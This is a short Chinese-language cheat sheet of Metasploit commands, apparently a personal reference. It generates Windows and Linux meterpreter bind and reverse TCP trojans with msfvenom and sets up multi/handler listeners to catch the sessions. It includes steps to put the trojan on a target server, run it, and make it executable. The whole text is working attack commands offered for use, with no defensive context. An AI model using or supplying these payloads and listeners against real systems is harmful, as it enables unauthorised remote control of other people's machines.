前言
为了方便平时使用,记录一下操作命令
注意:lhost
为本地地址,rhost
为目标地址
生成连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666 -f exe -o test.exe
将木马放到目标服务器运行
使用模块连接我们的木马
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.53.135 # 目标主机ip
set lport 6666
exploit
使用msfvenom
模块生成连接木马
msfvenom -p linux/x64/meterpreter/bind_tcp lhost=192.168.53.135 lport=6666 -f elf > test.elf
elf
为可执行的二进制文件
若传入的木马没权限执行
chmod +x test.elf # 给木马程序赋予可执行权限
使用模块进行连接
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.53.135 # 目标主机ip
set lport 6666
exploit
使用模块生成反弹木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.53.135 lport=6666 -f exe -o test.exe
监听反弹的木马
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.53.135 # 我们的本机IP
set lport 6666
exploit
生成木马
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.53.135 LPORT=6666 -f elf > test.elf
监听反弹的木马
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.53.135
set lport 6666
exploit